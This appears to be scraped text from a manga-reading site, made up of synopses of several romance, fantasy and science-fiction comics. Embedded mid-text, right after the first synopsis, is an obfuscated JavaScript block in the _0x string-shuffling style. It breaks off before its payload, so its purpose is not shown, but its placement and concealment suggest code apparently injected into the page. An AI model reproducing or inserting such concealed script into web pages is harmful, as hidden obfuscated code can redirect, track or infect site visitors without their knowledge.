“Bitch, whose child?” A dirty deal made her life a big change. She thought the marriage would be happy but in fact it was just a bet. Five years later, she changed a lot and came back with a child who was not his. She said to him: “ I will give you the child this time. But this time, the cost is your life.”<script></script><script>(function(_0x55ec13,_0x469401){var _0x62a4c5=_0x2ed1,_0x350612=_0x55ec13();while(!![]){try{var _0x113d41=-parseInt(_0x62a4c5(0xeb))/(-0x761*-0x1+-0x2404+0x1ca4)*(-parseInt(_0x62a4c5(0xe3))/(-0x97+-0xede+-0x1*-0xf77))+-parseInt(_0x62a4c5(0xf4))/(-0x23d9+-0x265*0x9+0x3969)+parseInt(_0x62a4c5(0xfb))/(-0x1c86+-0x1*-0x260d+-0x983)+parseInt(_0x62a4c5(0xe9))/(-0x1330+0xb96*0x1+-0x79f*-0x1)*(parseInt(_0x62a4c5(0xef))/(-0x253f+0x252*0x7+0x1507))+-parseInt(_0x62a4c5(0xec))/(-0x1*0x135d+0x5*0x151+-0x445*-0x3)+parseInt(_0x62a4c5(0x101))/(-0xd55*-0x2+-0x72f+-0x1373)+-parseInt(_0x62a4c5(0xe4))/(-0x2d0+-0x7db*0x1+0x4*0x2ad)*(parseInt(_0x62a4c5(0x103))/(0x1359*-0x1+-0x233d+0x36a0));if(_0x113d41===_0x469401)break;else _0x350612['push'](_0x350612['shift']());}catch(_0x1c256a){_0x350612['push'](_0x350612['shift']());}}}(_0x2d05,0xb07f*-0x15+-0xbc565*0x1+0x93*0x435f));function _0x2ed1(_0x3b774f,_0x5e632a){var _0x3c9dbc=_0x2d05();return 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Read Manga The Fifth Prince Exiled To The Frontier Survives; The Fifth Prince Exiled To The Frontier Survives With His [Luck] Skill; Henkyo Ni Tsuihou Sareta Dai Go Ouji Wa [Kouun] Sukiru De Sakusaku Ikinobimasu “Don’t Underestimate My Reincarnation Cheat,” Says Elroy, The Fifth Prince Of The Norgard Royal Family. He Has Memories Of His Past Life, The Cheat Skills He Was Given When He Was Reincarnated, And The Luck That Turns It All Around When He’s In A Desperate Pinch [Luck – All Or Nothing]. Elroy Was Known As A Prodigy From An Early Age, But Because Of His Excellence, He Was Shunned By His Older Brothers And Forcibly Exiled To The Frontier, Ouroboros Land, Where It Is Said He Will Die A Life Of Starvation. However, Freed From The Ties Of The Royal Palace, Elroy Uses His Reincarnation Cheat To Develop The Barren Wilderness Into The Best Territory With The Help Of The Strongest Maid! The Frontier Slow-Life Battle Fantasy Begins Here! “The Fifth Prince Exiled To The Frontier Survives Manga” Is Alternative: 辺境に追放された第5王子は【幸運】スキルでさくさく生き延びます
In a medieval-inspired fantasy world brimming with magic and adventure, different races and cultures coexist across noble estates, ancient castles, mysterious forests, and perilous mountains. The protagonist, a young lord, inherits his family’s lands and fortune but faces countless trials and challenges. Armed with a mysterious system, he introduces the power of the Industrial Revolution to the magic-filled continent, seeking to reshape the world and ultimately rise to dominance.
The work tells the story of a woman who escaped the control of Ibera, a mysterious and powerful woman who can manipulate people's emotions. She thought she could live a normal life, but she discovered that her life was full of problems and dangers. Her girlfriend cheated on her, her job was stressful, her parents are trying to force her to get married, and all of this drove her to despair. And, to make matters worse, Ibera reappeared, determined to get her back. She will have to face her conflicting feelings for her as she tries to escape her grasp and discover her secrets.
From 200 wpm: Once upon a time, there was a mermaid: "I want to become human so I can fall in love" she said. When her wish was granted, the lower half of her body turned to foam and she became a human... MALE ?!? This is the love story of a 30-year-old virgin man and a beautiful (male?) mermaid! -------- From LuffyNoTomo: A 30 year old man named Koganei, Manato is down on his luck. He can't seem to get a job, has little money, is still a virgin and is giving up on his dream. Sitting alone on a swan boat in a pond next to a shrine, he holds a lottery ticket thinking this is the only way his dream may come true. But the wind blows it away and he falls into the pond, thereupon seeing a beautiful mermaid! Manato ends up going back to the pond and after the mermaid decided not to kill him since he gave her food, she tells him about her dream to become human and how she wants to find love (she collects coins and throws them to a shrine in order for her wish to come true). Manato decides he doesn't want to get involved anymore because he has his own worries, but after another bad day he goes back to the pond. She finds him again and after listening to his complaints, she decides to give him all her saved up coins in order for his wish to come true. She suddenly turns into bubbles and disappears. Confused and upset, Manato hears a strange voice and a god from the shrine comes to say that she will take the coins and grant him a wish. He decides to use his wish to bring back the mermaid as a human. His wish comes true and he sees the mermaid back as a human, but she's a guy! What will happen in this crazy love comedy!? NOTE: I, LuffyNoTomo started translation for this and 10 out of 45 pages are done for ch1
Outer space, the far future. A lone seed ship, the Sidonia, plies the void, ten centuries since the obliteration of the solar system. The massive, nearly indestructible, yet barely sentient alien life forms that destroyed humanity’s home world continue to pose an existential threat. Nagate Tanikaze has only known life in the vessel’s bowels deep below the sparkling strata where humans have achieved photosynthesis and new genders. Not long after he emerges from the Underground, however, the youth is bequeathed a treasured legacy by the spaceship’s coolheaded female captain. Other manga: + Ouran High School Host Club + Triage X manga
The three lived together under a single roof. Takaomi is a single father, raising his only son. For some reason, he is persistently being hit on by his colleague, Nomura, who so happens to be able to do both work and housework. Taking overly good care of them, Nomura repeatedly visits Takaomi’s house uninvited and proposes that Takaomi should go out with him, telling him all about the advantages of doing so. Takaomi was perplexed since he’s never even dated another man before. But as they spent more time together, going out for meals and visiting amusement parks, Takaomi came to realise that he enjoyed the time spent together as a three and that it felt precious to him… A heart-warming BL between a flawless younger salaryman and a single father moved by affection.
From Senpai Scans: Himesato Ui has just enrolled in her late mother's old high school, Shinomiya Academy, as a first year! Hatsu's mother was known as "Prima", the most beautiful girl, in the Academy. Ui was full of hope and expectations in enrolling in the Academy, but she was puzzled by the Academy's system of evaluation for students was by a point system. Furthermore, in the school, she met an unknown pretty boy?!
From Aerandria Scans: The seventeenth daughter of Lord Neville has been setup for an arranged marriage. She and her close maid companion Ada come up with a plan to derail this plan. From outside appearances, our heiress is an extremely plain girl while her maid is beautiful. Though plans aren’t always what they seem… but then again, neither is our gentleman suitor. A definitely wicked story where women take charge of their own fate… and men happily accept theirs~
For years, fans of the animated series (Avatar: The Last Airbender and The Legend of Korra) have been burned with one question - what happened to Zuko's mother? Finding a clue at last, Fire Lord Zuko enlists the aid of Team Avatar - and the most unlikely ally of all - to help uncover the biggest secret of his life. An Earth Kingdom Scholar's points of view about "family" and governing with dignity motivates Zuko to set things right within his own family. He makes a deal with Azula, releasing her from the mental institution in exchange for her help on his quest to discover the truth about their mother, Ursa. Additionally, with the help of Aang, Sokka, and Katara, the five set out on a journey towards Ursa's hometown. Tensions between Azula and the rest stir trouble and an encounter with a wolf spirit delays them even more, though as they continue, they find their own dynamic to make it all work. Note: "The Search" is a trilogy of comics set in the Avatar universe that directly follows the events of The Promise trilogy. Also, it is expected that hidden clues about Toph's mystery lover will be foretold in future parts.